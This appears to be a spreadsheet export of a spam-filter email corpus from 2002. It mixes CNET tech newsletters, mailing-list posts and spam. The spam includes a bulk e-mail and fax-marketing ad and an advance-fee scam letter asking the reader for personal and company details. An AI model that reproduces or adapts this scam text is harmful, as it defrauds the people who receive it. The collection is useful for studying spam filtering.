 Analyst Ed Snyder lowers his rating from "buy" despite a strong quarter from the wireless communications gear maker. Powerwave has a diversified customer base and fewer competitors now, Snyder suggests. But he cuts his estimates and rating based on lower guidance from the company, weak third-generation (3G) wireless network orders, and likely cuts in carrier capital expenditures. The infrastructure market remains lumpy and hard to predict, Snyder says.&lt;br&gt;&lt;B&gt;POWERWAVE TECHNOLOGIES 6.61 -13.03% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wtiBqvAf1xmYgHobjqmZR"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href="http://clickthru.online.com/Click?q=35-d6JTIbIziyDH27kKNXLTSyPWc3uR" &gt;AOL on the hunt for new CEO &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 AOL Time Warner has begun casting a net for a chief executive for its beleaguered America Online division.
 The move comes as no surprise. Former AOL CEO Barry Schuler stepped down from the position in April. But it raises questions about the future of Robert Pittman, AOL Time Warner's chief operating officer and the interim head of AOL. Pittman had been charged with fixing the division. As previously reported, sources in the company speculate that Pittman will not return to his duties as COO once he completes his stint at AOL.&lt;br&gt;&lt;B&gt;AOL TIME WARNER INC 13.14 -4.09% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUoBNEFsxoLkkTKhn-yR"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href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_ZAQq6l6fez6pa6cIJPR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMF7aQEG_rjups7LLZ5eR"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href="http://clickthru.online.com/Click?q=8a-3y3dQXndGBqF02jO3Nt-tKChBwsR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHZ5QVoYlcGhVIlcU_ZR"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href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uG9wm-YqJzDxDXozLCdR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBBxxGQ8jg0SxiPZvH6cR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawx0cvj_tTbDS-BJjhoRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQd5HzkgCs3CyJqsjeoFR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBPyGn1Og3F-erCpGY99R" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRz5hrbORl28NRQSnqQuR"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href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QBmttsBDFWVhZSgRXBsR"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href="http://clickthru.online.com/Click?q=48-ggFbIdBsks6CyHTXl_kj2ZBSJu4R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQszAgt2obvZm5yGKIaeR" &gt;&lt;img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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=72-R8iHzrUKnEe7qzQRqChXcoIb0OxMcRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL1YZNX4eplrQ8kasp4ZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyfry_j8lXdIl9Oi-UidR"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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddp4bWkwr9i_f_B0NLncR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsc9GhvJWdT_pfmeDx0RR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb8juwHxvpmtTwxp6DtFR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWuKde5UH3XX8owMnercR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xKMSFV5map_vCgSyiLRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2M0xh9PGQ1U5MauO37xFR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e426&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=30-u8jEnsrBWMmUIzzbzlIIGDpqNsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Oct 08, 2002 at 11:51:54AM -0700, Elias wrote:
 &gt; So, given the apparent commonality of these occurances, companies appear 
 &gt; to be losing a large amount of money by mailing these tiny checks out. 
 &gt; Why can't they simply credit the account in question on the next bill? 
 &gt; Granted, if an account has been closed there is no such option...
 I've been waiting for Hettinga to regale us with one of his well-tuned
 micro-cash-bearer-settlement-geodesic-finance rants. Bob, you are SO 
 disappointing me.
 -- 
 njl
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] stupid pics of the day
</t>
  </si>
  <si>
    <t xml:space="preserve">Some local Irish wildlife
 http://www.iol.ie/~padraiga/pics/wild1.jpg
 http://www.iol.ie/~padraiga/pics/wild2.jpg
 was I bored or what?
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: breaking news: e-mail &amp; fax marketing works
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#6666CC" vlink="#999999" alink="#663333"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="84%"&gt;
   &lt;tr&gt; 
     &lt;td height="27" valign="top"&gt; &lt;font face="arial, Arial, Helvetica"&gt; 
       &lt;p&gt;&lt;font color="#009933" face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#006633" size="5"&gt;&lt;b&gt;&lt;font color="#660099"&gt;Promote 
         Your Product or Service to Millions Today!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/font&gt;&lt;/td&gt;
  &lt;/table&gt;
 &lt;table dir="ltr" border="0" cellpadding="0" cellspacing="0" width="85%" height="487"&gt;
   &lt;tr&gt;
     &lt;td valign="top" width="385" height="487"&gt; 
       &lt;p&gt;&lt;img src="http://81.9.8.7/OS53062.JPG" width="385" height="527"&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;td valign="top" width="1" height="487"&gt;&lt;/td&gt;
     &lt;!--msnavigation--&gt;
     &lt;td valign="top" width="455" height="487"&gt; &lt;font face="arial, Arial, Helvetica"&gt; 
       &lt;p style="margin-top: 0; margin-bottom: 0"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;/font&gt;&lt;font color="#009933" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt; 
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#0000FF" size="4"&gt;&lt;u&gt;&lt;font color="#660099"&gt;E-Mail 
         Marketing System&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font size="3"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font size="3"&gt;&lt;font color="#000000"&gt;- 
         Bulk e-mail will make you money so fast, your head will spin!&lt;br&gt;
         - Customers say &amp;quot;we would no longer be in business without it&amp;quot;&lt;br&gt;
         - New package deal includes everything you need.&lt;br&gt;
         &lt;font size="2"&gt;See this product's web page&lt;/font&gt;&lt;/font&gt;&lt;font color="#FF0000"&gt; 
         &lt;/font&gt;&lt;font color="#666666"&gt;&lt;a href="http://81.9.8.7/E-Mail%20Marketing.htm"&gt;&lt;font size="4"&gt;Click 
         Here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font color="#006633" size="3"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#0000FF" size="4"&gt;&lt;u&gt;&lt;font color="#660099"&gt;1 
         Million Business Leads on CD&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;- 
         For telemarketing, mailing, or faxing this list is a gold mine!&lt;br&gt;
         - Contains company name, address, phone, fax, SIC, &amp;amp; size.&lt;br&gt;
         - List allows for unlimited use.&lt;br&gt;
         &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;/font&gt;&lt;font color="#666666"&gt;&lt;a href="http://81.9.8.7/Business%20CD.htm"&gt;&lt;font size="4"&gt;Click 
         Here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="4" color="#0000FF"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;u&gt;&lt;font color="#660099"&gt;Fax 
         Marketing System&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;- 
         Fax broadcasting is the hot new way to market your business!&lt;br&gt;
         - People are 10 times more likely to read faxes than direct mail.&lt;br&gt;
         - Software &amp;amp; 4 million leads turns your computer into a fax blaster.&lt;br&gt;
         &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;/font&gt;&lt;font color="#666666"&gt;&lt;a href="http://81.9.8.7/Fax%20Marketing.htm"&gt;&lt;font size="4"&gt;Click 
         Here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#660099" size="4"&gt;Visit 
         our Web Site or Call 618-288-6661&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;to be taken off of 
         our list &lt;a href="mailto:l1l12345a1@btamail.net.cn"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;    &lt;/td&gt;
  &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [unison-announce] New unison beta-release (2.9.20) now available
</t>
  </si>
  <si>
    <t xml:space="preserve">If you examine the log further, you'll see debug messages generated by the
 (content) reporting process that follows error 230.
 On Wed, Oct 02, 2002 at 10:20:49PM -0700, Jordan Ritter wrote:
 &gt; Error 230 occurs when you report a signature, but the server doesn't
 &gt; know about the signature, so it wants the full content.  It's
 &gt; basically an optimization.  
 &gt; 
 &gt; Beyond that, I'm not sure how to interpret that output.. what version?
 &gt; Vipul?
 &gt; 
 &gt; On Wed, Oct 02, 2002 at 11:59:01PM -0400, Rose, Bobby wrote:
 &gt; # What does this mean?  I set up procmailrc for a spamtrap but I'm getting
 &gt; # an error.  I also am reporting to pyzor and dcc and they aren't
 &gt; # registering an error.  What's weird is that it works sometimes.
 &gt; # 
 &gt; # .
 &gt; # Oct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20
 &gt; # Oct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3
 &gt; # -res=1
 &gt; # err=230
 &gt; # .
 &gt; # Oct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special
 &gt; # case eng 1: Server accept
 &gt; # ed report.
 &gt; # Oct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -
 &gt; # server wants mail
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed yet."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</si>
  <si>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Subject: investment
</t>
  </si>
  <si>
    <t xml:space="preserve">This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 --=_NextPart_Caramail_0116921030135594_ID
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ATTN: President,
 From: Mrs.Helina karimu
 I am an investor a citizen of Angola currently on exile in 
 Benin Republic because of the civil war in my country.I 
 wish to invest in a country with political stability, 
 reliable, dependable infrastructure and security of life 
 and property.
 I was given your contact address by a foriegner who was on 
 a working visit in Cotonou. She said that your company can 
 assist me on my investment plans, if I am lucky that your 
 company may be willing to assist me.It may interest you to 
 know that I am having $30.5 Million US Dollars ready for 
 investment,this amount was left behind for 
 me and my children by my late husband.
 I am willing to invest in a company with potentials for 
 growth and stability including your company if your bye- 
 laws allows for foreign investors or any other good and 
 profitable business that you may suggest.I will be very 
 happy if this enquiry receive urgent attention.
 You should mail your acceptance by sending to me your 
 personal and company profile as I will also send to you all 
 required information about myself and the help that I need 
 from you about my investment plans.
 You can also reach me at:helinakarimu@ecplaza.net and 
 hk_hk@post.com. 
 Hoping for a very successful business relationship with you.
 Yours Truly,
 Mrs.Helina Karimu.
 (Investor)
 ______________________________________________________
 Bo=EEte aux lettres - Caramail - http://www.caramail.com
 --=_NextPart_Caramail_0116921030135594_ID--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Currie returns to pile scorn on Major
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,4,215/
 Date: 2002-10-03T04:21:03+01:00
 *Politics:* Ex-lover tours studios to denounce former PM.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cheers, Adam.
 Perhaps people are starting to notice how profit motive drains the 
 meaning out of their lives. Kinda sucks to be an ant farming for the 
 corporate lords. Funny how most of the rest of the world is more and 
 more apprehensive towards American Democracy.
 I just went to DC for the first time. I was awestruck by the 
 monuments, the words of Thomas Jefferson, the Spirit of Democracy set 
 in stone. Amazing to think that in little more than 200 years our 
 government could be so far removed from those honorable principles. 
 Adam Smith presumed that the marketplace would regulate itself 
 through morality, good faith, and responsibility. Corporate America 
 seems to feel that those principles stand in the way of making the 
 real bucks. How much more can they co-opt and commodify? Get your 
 copyrights in quick so you can hold on to your piece of the pie. 
 Health care, public programs, pensions, social security - these are 
 now regarded as worthless unless they can turn a profit.
 Ah, socialized medicine. Siestas. 6 week vacation leave. I hear Spain 
 is nice this time of year...
 At 2:35 PM -0700 7/25/02, Adam L. Beberg wrote:
 &gt;On Wed, 24 Jul 2002, Tom wrote:
 &gt;
 &gt;&gt;  "Around the world, there is a growing sense that democracy has not
 &gt;&gt;  delivered development" Sakiko Fukuda-Parr UN report author
 &gt;
 &gt;Or perhaps it is the unregulated and out of control capitalism used as a
 &gt;tool to concentrate wealth and form a greed-based society?
 &gt;
 &gt;I notice the top 5 have a good amount of socialism in their systems to
 &gt;regulate the capitalism, especially in things like health care and
 &gt;education.
 &gt;
 &gt;Just look at our health care - no insurance = no care. Or education - gimme
 &gt;my voucher so I can get my kids out of the system while their IQ is still
 &gt;over 20.
 &gt;
 &gt;South American countries are currently figuring out just where this
 &gt;greed-based system ends up, and are looking for a way out.
 &gt;
 &gt;It was a fun ride tho wasnt it?
 &gt;
 &gt;- Adam L. "Duncan" Beberg
 &gt;   http://www.mithral.com/~beberg/
 &gt;   beberg@mithral.com
 &gt;
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-10-02
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Announcing SouthFlorida.pm
     posted by ziggy on Tuesday October 01, @10:50 (groups)
     http://use.perl.org/article.pl?sid=02/10/01/1450259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</si>
  <si>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&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Copies, Webcasts tangled in draft bill &lt;/title&gt;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href="http://clickthru.online.com/Click?q=1b-wAnhI3N2I6Ju9P3Q1U5MauO37xrR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsDV-d7VuyLxjkqVAXXblR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDS3jY89aa1cN0535V0Y9R" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUT4TY15xCjjvDSwizzcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VKPoOE7Kns2asfI8UkRR"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11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Copies, Webcasts tangled in draft bill &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Sharp's Zaurus PDA suffers security holes&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Outlook plug-in could let the hackers in&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 ACLU: Don't rat out your customers&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Shareholders sue PayPal, eBay&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Ellison: I don't need an understudy&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfYObyyhaf70SVbToBBPR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Copies, Webcasts tangled in draft bill &lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Legislators are readying a bill that could sharply limit Americans' rights relating to copying music, taping TV shows, and transferring files through the Internet.
 At the same time, the draft legislation seen by CNET News.com would place the struggling Webcasting industry on firmer legal footing.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:35 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGS6VsaAFigi7yr9FKgnR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Sharp's Zaurus PDA suffers security holes&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Sharp's Linux-based, business-oriented Zaurus handheld suffers from security holes that could let hackers grab private data off a corporate network, according to researchers at Syracuse University.
 In an advisory posted Wednesday to a Syracuse University computer-science Web site, researchers said they had found vulnerabilities in Sharp's Zaurus SL-5500 and Zaurus SL-5000D handhelds. The flaws let attackers take control of the device's file system, giving them the power to overwrite files or lock the device so no data can be input through the keypad or touch screen.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 12:50 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-YFQffXdxQMKtNX8PQiR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Outlook plug-in could let the hackers in&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A widely used plug-in for Microsoft's Outlook e-mail client that lets users encrypt and digitally sign messages has inadvertently weakened security and left the mail program open to attack.
 Security company eEye Digital Security issued a warning late Wednesday to users of Network Associates' Pretty Good Privacy (PGP) plug-in for Outlook, saying that a vulnerability in the add-on could let attackers execute malicious software on a victim's computer. Network Associates released a patch for the problem Wednesday as well.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:05 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaFARJ3JTzSROUJEymxqPR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;ACLU: Don't rat out your customers&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A clutch of civil liberties groups is asking small Internet service providers to get a backbone and stand up to companies seeking to unveil anonymous critics.
 A group including the Electronic Frontier Foundation, the American Civil Liberties Union (ACLU), and the Center for Democracy and Technology is urging ISPs to alert customers when they are the targets of so-called John Doe legal actions, which try to unmask the identities of people who anonymously air their companies' dirty laundry. The group has sent letters to more than 100 ISPs, asking them to adopt a written policy promising to let customers know if they're targets.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 12:35 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_yDGts5bjsMVKpv3DxnR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Shareholders sue PayPal, eBay&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The PayPal-eBay merger has hit an early snag: Two shareholder lawsuits have been filed against the companies seeking to block the deal.
 The lawsuits, each filed in Delaware Chancery Court earlier this week on behalf of PayPal shareholders, charge that the deal represents a breach of the companies' fiduciary duty to those shareholders and that the price eBay is paying for PayPal is unfair and inadequate, the companies said in separate regulatory filings on Thursday.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002, 11:50 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvcfT2BIqBxDVAmoBameR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Ellison: I don't need an understudy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Deflecting continuing calls for a No. 2 executive, Oracle Chief Executive Larry Ellison said again Wednesday that the company does not need anyone to back him up.
 Ellison, responding primarily to recent news stories that the company might need a second in command, said the current team is enough to guide Oracle.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 6:05 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_0PZdS98BbBL7kOi_yR"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&lt;b&gt;Meet Microsoft, home networker&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Colossus of Redmond's next bold move is into routers that'll let consumers connect their digital devices together and to the Net.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOl10dmFKMZ2Fz8IR7XlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Sprint: Not out, but winded&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 While it's hardly the next WorldCom, slowing wireless growth and red ink in long-distance are hardly fuel for its stock.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 11, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
